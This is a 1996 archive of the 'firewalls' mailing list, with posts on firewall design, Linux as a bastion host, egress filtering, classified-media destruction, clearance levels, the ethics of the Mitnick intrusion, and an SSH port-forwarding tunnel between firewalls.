(8.7.1-lists/Lists-951222-1) id UAA21169 for firewalls-outgoing; Fri, 12 Jan 1996 20:32:14 -0800 (PST) Received: from sheeba.rcooper.the-wire.com (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA21118 for ; Fri, 12 Jan 1996 20:32:01 -0800 (PST) Received: from rwcooper.rcooper.the-wire.com ([205.206.47.2]) by sheeba.rcooper.the-wire.com (post.office MTA v1.9.1 evaluation license) with SMTP id AAA284; Fri, 12 Jan 1996 23:29:59 -0500 Received: by rwcooper.rcooper.the-wire.com with Microsoft Mail id <01BAE1AA.47712FC0@rwcooper.rcooper.the-wire.com>; Sat, 13 Jan 1996 11:28:36 -0500 Message-ID: <01BAE1AA.47712FC0@rwcooper.rcooper.the-wire.com> From: Russ Cooper To: "firewalls@GreatCircle.COM" Cc: "dannyc@gmap.leeds.ac.uk" Subject: RE: Firewall design - routers and commercial kit Date: Sat, 13 Jan 1996 11:28:35 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk BorderWare has the ability to put a third NIC in their Firewall making a Secure Side Network. The external NIC still has all its own servers, so your IP translation is still in effect, and you're not allowing traffic into your internal network whatsoever. All this and you don't have to add any additional routers to your configuration. +------------+ | | +----------+ | Borderware | | | Internal | | | Outbound | ===========+ Firewall +=============+ | Network | | | Router | | Server | | | | | +----------+ +------+-----+ | | | Secure | Side +------------+ | Network | | | | | | | WWW | |=========| | | | Server | | | | | | | | +------------+ | | Cheers, Russ Cooper Sr. Internet Integration Engineer SHL/Computer Innovations rcooper@the-wire.com -- rwcooper@shl.com "can someone tell me where to go today to get the money to go to where I want to go today" From firewalls-owner Fri Jan 12 20:55:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA23510 for firewalls-outgoing; Fri, 12 Jan 1996 20:51:14 -0800 (PST) Received: from taz.nda.com ([206.0.206.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA23488 for ; Fri, 12 Jan 1996 20:51:06 -0800 (PST) Received: (from kovar@localhost) by taz.nda.com (8.7.3/8.7.3) id UAA12586; Fri, 12 Jan 1996 20:50:02 -0800 (PST) From: David Kovar Message-Id: <199601130450.UAA12586@taz.nda.com> Subject: Re: "Title for Firewall Admin? To: craiga@Ipsilon.COM (Craig Anderson) Date: Fri, 12 Jan 1996 20:50:01 -0800 (PST) Cc: yevaud@netcom.com, Firewalls@GreatCircle.COM In-Reply-To: <199601130256.SAA07434@mailhost.Ipsilon.COM> from "Craig Anderson" at Jan 12, 96 06:56:11 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Any chance of terminating this discussion? It's taken up more bandwidth than anything else on the list for the last few days. -David From firewalls-owner Fri Jan 12 21:10:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA22101 for firewalls-outgoing; Fri, 12 Jan 1996 20:40:10 -0800 (PST) Received: from gwydion.hns.st-louis.mo.us (dialup-105.icon-stl.net [199.217.153.105]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA22094 for ; Fri, 12 Jan 1996 20:40:04 -0800 (PST) Received: (from kenth@localhost) by gwydion.hns.st-louis.mo.us (8.7.3/8.7.2) id WAA05762; Fri, 12 Jan 1996 22:39:13 -0600 (CST) From: Kent Hamilton Message-Id: <199601130439.WAA05762@gwydion.hns.st-louis.mo.us> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) To: proberts@clark.net (Paul D. Robertson) Date: Fri, 12 Jan 1996 22:39:13 -0600 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Paul D. Robertson" at Jan 11, 96 11:50:08 pm Reply-To: KentH@HNS.St-Louis.Mo.US X-Mailer: ELM [version 2.4 PL24 ME8b] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > On Thu, 11 Jan 1996, Brain21 wrote: > > > On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > > > > > email (3 complete overwrites with random data if I recall correctly) and then > > > > I thought that the NSA could read approx. 7 writes deep. If thought that > > you just put bullets in those drives (quite literally) instead of > > rewriting them. > > > > I'm sure someone who has a better memory will correct me, but I think > three or five complete overwrites used to be approved for up to secret > (no longer approved, and may have acutally been for up to top secret, > memory fades). I think it used to be 3 over-writes when I last had to worry about it. [ removed ] > Back before I entered the world of real classified, we had a big green > sledgehammer with which to destroy our secret wartime data that resided > on 2314 diskpacks. The BFGSH (Big _____ Green Sledge Hammer), correctly > weilded was I would suppose approved for emergency destruction only. I > don't think they trusted us with too many thermite grenades :( Hey, ours was *RED*..... :-) Actually for disk packs with TS on 'em the approved method for destruction about 7 years ago was to take a sander to the platter then degauss what was left... no idea if it's changed since then. -- Kent Hamilton Work: KHamilton@Hunter.COM URL: http://www.icon-stl.net/~khamilto Play: KentH@HNS.St-Louis.Mo.US From firewalls-owner Fri Jan 12 21:10:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA20047 for firewalls-outgoing; Fri, 12 Jan 1996 20:23:21 -0800 (PST) Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA20033; Fri, 12 Jan 1996 20:23:09 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle (8.6.12/8.6.12) with ESMTP id WAA27564; Fri, 12 Jan 1996 22:21:54 -0600 Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id WAA23432; Fri, 12 Jan 1996 22:21:53 -0600 Posted-Date: Fri, 12 Jan 1996 22:21:53 -0600 Date: Fri, 12 Jan 1996 22:21:52 -0600 (CST) From: Ron DuFresne To: Brent Chapman , PADGETT@hobbes.orl.mmc.com, jeff.aldrich@merrillcorp.com, pnh1rgr@mclo10.med.navy.mil, brain21@montag33.residence.gatech.edu, ngps@cbn.com.sg, topher@ns.ncsa.com, mjr@switchblade.v-one.com cc: firewalls@GreatCircle.COM Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Brent Chapman wrote: > At 6:49 PM 1/12/96, Ron DuFresne wrote: > > >I recall not there being any 'damage' done other than the access and the > >'taking' of copies of files that it seems should not have been on this > >unprotected machine... > > In other words, because those files (in your opinion) shouldn't have been > on that machine, it was OK for someone to break in and take them? Sorry, > nice fantasy, but that's not the way the law works. Hmm, seems to have rustled your feathers a bit, well, that happens from time to time in life.... Actually, with all the postering here, I was doing a bit of my own concerning this matter. The main point being made on this end was that T. S. was surprisingly stupid for a man of his known talent and skills to have such tools exposed to as the paranoid here would like to term 'certain risk'. And that T. S. was in his own way then taunting Mitnick to come and grab copies of those tools. Course, one wonders, was said machine also bannering to potential 'crackers' something to the effect that this is a private machine and entrance is forbidden? Doesn't this have something to do with the "what is and is not expressly permitted" rules underlying the whole of network security? > > The front door of your home should never be unlocked when the house is > unattended. If you go off and forget to lock it on your way out one day, > though, that absolutely definitely does NOT mean that it's proper or legal > or ethical or anything else for someone to come in and raid your stuff. > There are express differences here, and the laws aren't yet firmly paved in stone when it comes to defining the legalities of digital data as compared to property. Yes, much work has been done, still more needs to be done in this arena. Copyright law, while it exists, is little more than a moot warning. And unless a system is trashed, the copying of files is not on the same par as the physical taking of items from ones home. Someone else mentioned here that the SPA and other entities, unless there are big bucks involved, show little interest in many and most pirating of SW. Look at the rampant warez distribution in IRC for an example. Locally, a cracker was recently given a small slap on the wrist for taking down I forget which 'freenet', and this despite the fact that the kid has continued cracking systems after that incident. While this may threaten folks in the network security field in some sense, it's going to have to be looked at carefully. Especially when viewed in a context on par with current Congressional legislation pending whos focus is concerned mostly with *indecency* and giving 'private' telcos the right to deal with long-distance services that the matter neigh at hand in this thread. > I think we've about reached the limit of absurdity on this thread; it's no > longer particularly relevant to firewalls. > Sure seems to be on topic and relevant in this light and when folks discuss it in the matters of how much regard was paid to the 'value' of the tools that T. S. unleashed into the hands of Mitnick and god knows who. Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Fri Jan 12 22:25:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA04880 for firewalls-outgoing; Fri, 12 Jan 1996 22:15:43 -0800 (PST) Received: from sheeba.rcooper.the-wire.com (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id WAA04813 for ; Fri, 12 Jan 1996 22:15:26 -0800 (PST) Received: from rwcooper.rcooper.the-wire.com ([205.206.47.2]) by sheeba.rcooper.the-wire.com (post.office MTA v1.9.1 evaluation license) with SMTP id AAA246; Sat, 13 Jan 1996 01:13:24 -0500 Received: by rwcooper.rcooper.the-wire.com with Microsoft Mail id <01BAE1B8.BA017640@rwcooper.rcooper.the-wire.com>; Sat, 13 Jan 1996 13:12:01 -0500 Message-ID: <01BAE1B8.BA017640@rwcooper.rcooper.the-wire.com> From: Russ Cooper To: "firewalls@GreatCircle.COM" , "'A. Padgett Peterson, P.E. Information Security'" Subject: RE: Encryption export laws from US. Date: Sat, 13 Jan 1996 13:11:47 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Padgett, What about the use of Dec Tunnels for end to end roving encryption. Sounded pretty good to me when it was pitched at a recent trade show. Cheers, Russ Cooper Sr. Internet Integration Engineer SHL/Computer Innovations rcooper@the-wire.com -- rwcooper@shl.com "can someone tell me where to go today to get the money to go to where I want to go today" From firewalls-owner Fri Jan 12 23:25:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA12819 for firewalls-outgoing; Fri, 12 Jan 1996 23:11:23 -0800 (PST) Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA12795; Fri, 12 Jan 1996 23:11:15 -0800 (PST) X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 12 Jan 1996 23:11:33 +0100 To: Eric Osborne , Firewalls@GreatCircle.COM From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Firewalls-Digest V5 #24 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 10:59 PM 1/12/96, Eric Osborne wrote: >I understand the value of setting a firewall rule to disallow >connections from the outside that claim to have the IP addresses of >the internal (local) network, but let me ask you firewall gurus a >questions: Is there any {point|feasibility|praticality} to setting >something like: > >deny outgoing packets that are not from the internal net > >The purpose of this, I would guess, is to prevent people on your >network from IP spoofing and hacking other networks. Would this >work? Yes. It also prevents folks from using you as a "transit" network, to and from the Internet. Whether this is a feature or a bug depends on your situation. -Brent ----------------------+----------------------------+------------------------ Brent Chapman | Great Circle Associates | 1057 West Dana Street Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041 ----------------------+----------------------------+------------------------ Internet Tutorials from the Experts! From firewalls-owner Fri Jan 12 23:55:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA17381 for firewalls-outgoing; Fri, 12 Jan 1996 23:49:34 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id XAA17350 for ; Fri, 12 Jan 1996 23:49:27 -0800 (PST) Received: from cixgate by relay2.UU.NET with SMTP id QQzyhr00447; Sat, 13 Jan 1996 02:48:23 -0500 (EST) Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA04154; Fri, 12 Jan 96 23:57:19 PST Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA01213; Fri, 12 Jan 96 23:42:51 PST Date: Fri, 12 Jan 96 23:42:51 PST From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9601130742.AA01213@manzanita.DEV.3Com.COM.noname> To: mjr@v-one.com, peter@nmti.com Subject: Re: "Title for Firewall Admin? Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I think most firewall admins are known by the title: > "Is the Web down?" The one I get is "Is the Internet down?"... ----- End Included Message ----- Yes, as if "The Internet" were say.... Woolworths. As in "Is the grocery store closed? BobK From firewalls-owner Sat Jan 13 05:25:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA11537 for firewalls-outgoing; Sat, 13 Jan 1996 05:21:38 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA11516 for ; Sat, 13 Jan 1996 05:21:31 -0800 (PST) Date: Sat, 13 Jan 1996 8:20:28 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <960113082028.20205193@hobbes.orl.mmc.com> Subject: Postulate on Lawz Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In all of the comments on "inducement", "B&E" et al the discussion seems to be missing one vital point: our (well my) mission in life is to avoid the need for law enforcement by making sure that the transgression never happens. True, I have seen people "terminated" (HR's term) for electronic transgressions - usually "mischarging" - but each time have felt that the system failed else things would not have gone that far. Prosecution does nothing to repair damage. Some justify it by saying it acts as a deterrent but IMNSHO (and in agreement with some of Pavlov's later work) only if enforcement is perceived as universal. About the time speeding stopped meaning a sure ticket and started being perceived as something involving "luck" and "selective enforcement" became an accepted practise, this ceased to be effective. That leaves only revenge. My concept of the job is to make sure that such things do not happen in the first place by denying those who might be temped a "target rich" environment. An effective firewall is one defensive measure but only one layer. Active measures (daemon pingers, socket openers, minefields) are another piece. Gentle notes of the type "Activity X was observed from this account at time Y. Were you having a problem ?" have proven very effective particularly when signed by "Guns & Dogs Inc." (Yes, we post monitoring warnings and all accounts are traceable to an employee who has signed an access agreement). Along these lines, the most irritating headline I have seen recently was the bit in the NYTimes about "Security Flaws in the Internet". There are no security flaws in the Internet because there is no security in the Internet. Like the lady taking a man's (original was "Army" but that has no meaning today) physical, "There's nothing wrong, it is just not there." Security is the responsibility of the users. RFCs provide standardized ways for the users to achieve secure communications but that is not the responsibility of the Internet, it's sole responsibility is to "deliver the mail". Warmly, Padgett ps "Keeper of the Eternal Flame" From firewalls-owner Sat Jan 13 08:40:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18037 for firewalls-outgoing; Sat, 13 Jan 1996 08:28:28 -0800 (PST) Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA18032 for ; Sat, 13 Jan 1996 08:28:24 -0800 (PST) Received: by netcom.netcom.com (8.6.12/Netcom) id IAA24907; Sat, 13 Jan 1996 08:25:43 -0800 Message-Id: <2.2.32.19960113172605.006b5c9c@netcom.com> X-Sender: dalel@netcom.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 13 Jan 1996 11:26:05 -0600 To: "A. Padgett Peterson, P.E. Information Security" From: Dale Lancaster Subject: re: "Q" Clearance Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 01:39 PM 1/12/96 -0500, A. Padgett Peterson, P.E. Information Security wrote: >> I hold a TS SCI clearance with the Air Force. I've been in for almost 10 >> years, and I've never heard of a "Q" clearance. > >Ten years ago is too recent. Back in the days of free trips to SouthEastAsia >there were several compartmented levels above Top Secret such as "R" >and "Crypto" that usually required EBIs. "Q" referred to certain "special >weapons" that I will not go into further. Does Brain21's father glow in the >dark ? > Warmly, > Padgett > > TS SCI is for the Intelligence Agencies (NSA, CIA, etc) and within that you have compartmented clearances. Q is for DOE Labs and is considered as stringent as TS/SI. It used to be if you had TS SCI they wouldn't accept your clearance at DOE and vice-versa. I think they got wise recently and decided that each other must be ok after all but they still have different clearance systems that don't interact. dml ====================================================================== Dale Lancaster Raptor Systems dalel@netcom.com (214) 423-6212 "My opinions are my own ... who else would have them? :-)" ====================================================================== From firewalls-owner Sat Jan 13 08:55:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18575 for firewalls-outgoing; Sat, 13 Jan 1996 08:54:09 -0800 (PST) Received: from neon.ingenia.com (neon.ingenia.com [205.207.219.29]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA18570 for ; Sat, 13 Jan 1996 08:54:04 -0800 (PST) Received: (from shaver@localhost) by neon.ingenia.com (8.6.12/8.6.9) id MAA10961; Sat, 13 Jan 1996 12:16:12 -0500 From: Mike Shaver Message-Id: <199601131716.MAA10961@neon.ingenia.com> Subject: Re: Linux as a firewall To: dana@nav.cc.tx.us (Dana Brewer) Date: Sat, 13 Jan 1996 12:16:11 -0500 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Dana Brewer" at Jan 12, 96 10:20:14 am X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thus spake Dana Brewer: > I've noticed that a lot of people say they use Linux as part of their > Internet firewall. But now I've had a company tell me that Linux isn't a > true multi-tasking operating system, so it shouldn't be used as a > firewall. What's the true story here? For the record, we don't use Linux as our firewall, but we do use it for just about every other part of our network. The reasons for not using it as our firewall are not related to the suitability of Linux for such a task. We may, in fact, be using Linux as a firewall internally very shortly. I've built a number of firewalls for clients that included a Linux machine as a bastion or filtering router. As far as the "not true multi-tasking", I suspect they're referring to the fact that it's not kernel-preemptive under the default configuration. There exist POSIX.4 extensions -- I think they're part of the standard kernel now (now == 1.3.57) -- which allow real-time scheduling. I don't know enough about real-time to tell you how much it helps, but I can tell you that the SMP bunch are working on finely-grained kernel locking and such, which puts it on par with just about every other SMP-capable OS. Kernel threads, as well, are here, for those who want to do assembly system calls. =) They're really just waiting for library support, I think, and should be "ready for prime time" and easily usable for the functional freeze preceding 1.4. Regardless, Linux is just as "true multitasking" as BSDI, and I don't want to be the one who tells mjr that BSDI isn't suitable for firewalls. =) Using Linux for a firewall may or may not save you money. You save some capital expenditures in the area of software purchase, but whether it's an overall savings is dependent on your facility with the system. This is likely true with all roll-your-own 'walls, though. (If you're buying a shrink-wrapped one, then the underlying OS may or may not be a concern.) You _can_ get support for Linux, you just have to know where to look. On traditional levels, there are organizations that offer support agreements with whatever level of service you're willing to pay for. Heck, we do it, although geography might be an issue. On other levels, you'll find the "vendors" to be much more responsive to questions (newbie or technical) than you will for many other OSes. (If you can find a bug and isolate the cause, submit a patch -- you have the source, right? -- and odds are very good it'll be incorporated into the next release. About a week, usually.) Security patches for Linux are typically quite timely, due to a combination of source availability for most of the environment (kernel, utilities, etc.) and the very large development base. Installation is pretty straightforward, if you get a good distribution. Redhat, for example. The stability of the kernel development process is often cited as a Bad Thing, since a new kernel is released at least once a week. You don't have to upgrade if you don't want to, though. Stick with what works... Performance-wise, Linux is no longer as bad as it once was. (1.0 was pretty brutal, especially where the networking was concerned.) The most recent releases (dubbed "Greased Weasel", for reasons that only Linus understands) are quite fast, due to improved page-management stuff, among other improvements. Linux has the fastest task switching of any Unix-like OS out there, as benchmarked by Larry McVoy. (Who knows his Unix...) > Ideally, in our situation, the > bastion host would be the firewall, the WWW server, the ftp server, the > Usenet news server, etc... Is this completely unrealistic? It's quite realistic... I did it last week. =) Basically, Linux is no less suitable for firewalling than any other OS with which you are equally familiar. Mike -- #> Mike Shaver (shaver@ingenia.com) Ingenia Communications Corporation <# #> UNIX medicine man -- dark magick, cheap! <# #> <# #> When the going gets tough, the tough give cryptic error messages. <# #> "We believe in rough consensus and running code." <# From firewalls-owner Sat Jan 13 10:25:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA19924 for firewalls-outgoing; Sat, 13 Jan 1996 10:24:03 -0800 (PST) Received: from VM.AKH-WIEN.AC.AT (VM.akh-wien.ac.at [149.148.50.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA19919 for ; Sat, 13 Jan 1996 10:23:58 -0800 (PST) Received: from [149.148.89.132] by VM.AKH-WIEN.AC.AT (IBM VM SMTP V2R3) with TCP; Sat, 13 Jan 96 19:22:09 CET X-Sender: chrisi@vm.akh-wien.ac.at Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Date: Sat, 13 Jan 1996 20:13:27 +0100 To: firewalls@greatcircle.com From: Chrisi@akh-wien.ac.at (Chrisi) Subject: Security Tip Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, we plan to connect several hp´s throught internet, like everybody we thinking of: * low cost (do we need a seperat computer for a Firewall and the production-machine -> with a database, WWW-Server) * can we enhance security with *just* the router (Limitations for access etc.) * we *only* want to use http,smtp,snmp,telnet and SQL-Net (a long list..) Sorry if my questions are very basics, but we just start our project in this direction. thank´s a lot for your answers, Christian From firewalls-owner Sat Jan 13 11:10:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA20495 for firewalls-outgoing; Sat, 13 Jan 1996 11:00:11 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA20480 for ; Sat, 13 Jan 1996 11:00:04 -0800 (PST) Received: from reynaldo.parc.xerox.com ([13.2.116.96]) by alpha.xerox.com with SMTP id <14708(14)>; Sat, 13 Jan 1996 10:58:59 PST Received: from localhost ([127.0.0.1]) by reynaldo.parc.xerox.com with SMTP id <34953>; Sat, 13 Jan 1996 10:58:36 -0800 X-Mailer: exmh version 1.6.4 10/10/95 To: firewalls@greatcircle.com cc: kerch@parc.xerox.com Subject: Re: "Q" Clearance In-reply-to: Your message of "Fri, 12 Jan 1996 13:39:07 EST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 13 Jan 1996 10:58:33 PST From: Berry Kercheval Message-Id: <96Jan13.105836pst.34953@reynaldo.parc.xerox.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>"A. Padgett Peterson, P.E. Information Security" said: > > I hold a TS SCI clearance with the Air Force. I've been in for almost 10 > > years, and I've never heard of a "Q" clearance. > > "Q" referred to certain "special > weapons" that I will not go into further. It's really not that hard. Top Secret is a Department of Defense clearance level. "Q" is a Department of Energy clearance level. The DoD controls all the military in the US. The DoE controls research, development and construction of nuclear weapons. All permanent employees of, say, Lawrence Livermore National Laboratory, run by the DoE (where I worked for 4 years) get "Q" clearances. I've had both. --berry Berry Kercheval :: kerch@parc.xerox.com :: Xerox Palo Alto Research Center From firewalls-owner Sat Jan 13 12:10:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA21509 for firewalls-outgoing; Sat, 13 Jan 1996 11:56:16 -0800 (PST) Received: from linknet.kitsap.lib.wa.us (linknet.kitsap.lib.wa.us [198.187.135.22]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA21504 for ; Sat, 13 Jan 1996 11:56:12 -0800 (PST) Received: (from jpaine@localhost) by linknet.kitsap.lib.wa.us (8.6.12/8.6.9) id LAA27902; Sat, 13 Jan 1996 11:55:22 -0800 Date: Sat, 13 Jan 1996 11:55:20 -0800 (PST) From: john paine To: Kent Hamilton cc: "Paul D. Robertson" , firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <199601130439.WAA05762@gwydion.hns.st-louis.mo.us> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Kent Hamilton wrote: > > On Thu, 11 Jan 1996, Brain21 wrote: > > > > > On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > > > > > > > email (3 complete overwrites with random data if I recall correctly) and then > > > > > > I thought that the NSA could read approx. 7 writes deep. If thought that > > > you just put bullets in those drives (quite literally) instead of > > > rewriting them. > > > > > > > I'm sure someone who has a better memory will correct me, but I think > > three or five complete overwrites used to be approved for up to secret > > (no longer approved, and may have acutally been for up to top secret, > > memory fades). > > I think it used to be 3 over-writes when I last had to worry about it. > > [ removed ] > > > Back before I entered the world of real classified, we had a big green > > sledgehammer with which to destroy our secret wartime data that resided > > on 2314 diskpacks. The BFGSH (Big _____ Green Sledge Hammer), correctly > > weilded was I would suppose approved for emergency destruction only. I > > don't think they trusted us with too many thermite grenades :( > > Hey, ours was *RED*..... :-) Actually for disk packs with TS on 'em > the approved method for destruction about 7 years ago was to take a > sander to the platter then degauss what was left... no idea if it's > changed since then. > > -- > Kent Hamilton Work: KHamilton@Hunter.COM > URL: http://www.icon-stl.net/~khamilto Play: KentH@HNS.St-Louis.Mo.US > Right now, there is a red hammer for the equipment, but the TS disposal method is (if I can remember the order correctly) deguassing, shredding, incineration and fusing (into a block of metallic ash). Jazzman From firewalls-owner Sat Jan 13 12:55:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA23592 for firewalls-outgoing; Sat, 13 Jan 1996 12:50:49 -0800 (PST) Received: from ic.co.at (ns.ic.co.at [193.81.168.69]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA23587 for ; Sat, 13 Jan 1996 12:50:40 -0800 (PST) Received: from ic.co.at (ic.co.at [193.80.225.2]) by ic.co.at (8.7.2/8.7.3) with SMTP id VAA06320; Sat, 13 Jan 1996 21:51:51 -0100 Date: Sat, 13 Jan 1996 21:51:51 -0100 (GMT-0100) From: Michael Haberler To: harti@eunet.co.at, cr@austria.eu.net cc: eunet-tech@eu.net, mheppe@oekb.co.at, macsek@oekb.co.at, martinek@oenb.co.at, revay@ibmvie.co.at, franz.simlinger@efp.co.at, martin.knoll@tiwag.co.at, krenn@tcs.co.at, firewalls@greatcircle.com, mko@downlink.co.at, kraml@kpmg.co.at, Michael Haberler Subject: Secure fw/fw tunnels mit SSH Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sometimes it's desirable to have a secure tunnel for a specific service, assume one site runs e.g. an Oracle server, another site an Oracle client, but the customer wants the client/server connection to be encrypted as long it goes over the Internet. Most TCP-based service can be tunneled this way. This is very easy to do with Secure Shell (see ftp://ftp.cs.hut.fi/pub/ssh) which is a rlogin/rsh replacement using strong encryption and authentication techniques, even if the actual servers and clients are behind a proxy setup and their IP addresses are not end-to-end-reachable. Assume you have the following setup, client wants to connect securely to port 1521 (sqlnet) on server. client--->fw1------>Internet--------->fw2-->server <-c1-> <-----------c2------------> <-c3-> Choose a port X, eg 1200, on fw1, and make sure this port can only be connected to from inside, not the Internet. Also, on fw2 choose a port for ssh (default 22), and permit connections from fw1 to it. Set up sshd on fw2. We use only RSA encryption, 768bit keys, and do not use the .rhosts/hosts.equiv BSD compatibility feature of ssh. On fw1 and fw2 set up a Unix user, eg 'tunnel'. login on fw1 as that user, and run ssh-keygen to create a public/private key pair for that user. Append the public key of that user (fw1:~tunnel/.ssh/identity.pub) to to fw2:~tunnel/.ssh/authorized_keys. Thus user fw1/tunnel will be able to connect to ssh on fw2, and be RSA authenticated. Make sure ~tunnel/.ssh is properly protected. Do not expose fw1:~tunnel/.ssh/identity.pub by all means. Now, on fw1, start slogin (and keep running, e.g. by running via inittab): slogin -x -n -v -C -c 3des -L 1200:server.dom.ain:1521 \ firewall2.dom.ain /path/sleep-forever This will open a listen port (fw1/port 1200). TCP connections to this port will cause sshd on fw2 to connect to server/1521 and forward all data sent/received over it, encrypting it between fw1 and fw2. (-v so you see whats going on, see the slogin manpage for details). For sleep-forever we use the eminent c-program 'main(){ pause();}', compile, and install it on fw2:/path/sleep-forever. We need this so slogin has something harmless, long-running to execute. Now have client connect to fw1/port 1200, and she should be connected to fw2/port 1521 . Just noise going over the Internet! Technically, these are three TCP connections plumbed together (c1,c2 are unencrypted, c3 is encrypted with Triple DES in the above example, choose according to belief..). Note that you can use gzip commpression with ssh (-C option above). I've run long X windows sessions over encrypted compressed tunnels, I got on the order of 4:1 compression on those. It does need some steam from the CPU, dont try this at home with your 386/25SX motherboards, folks! Tried with hpux9.03 (fw2), linux1.3.54 (fw1), ssh-1.2.12, worked first time. I'm not sure what happens if the underlying client/server connections uses esoteric stuff, e.g. the TCP Urgent data option, which is rare. Of course, client & server could also be a terminal server which create/accept straight TCP connections. One could probably build a encrypted dialin and dialout service over the Internet that way. Michael Haberler ps: thanks to Tatu Ylonen for a great program. ps: any security risks I overlooked? --- Michael Haberler mah@eunet.co.at EUnet Austria Ltd MH182 A-1090 Vienna, Austria, Thurngasse 8/16 Tel: +43 (1) 31376 fax: +43 (1) 3106926 From firewalls-owner Sat Jan 13 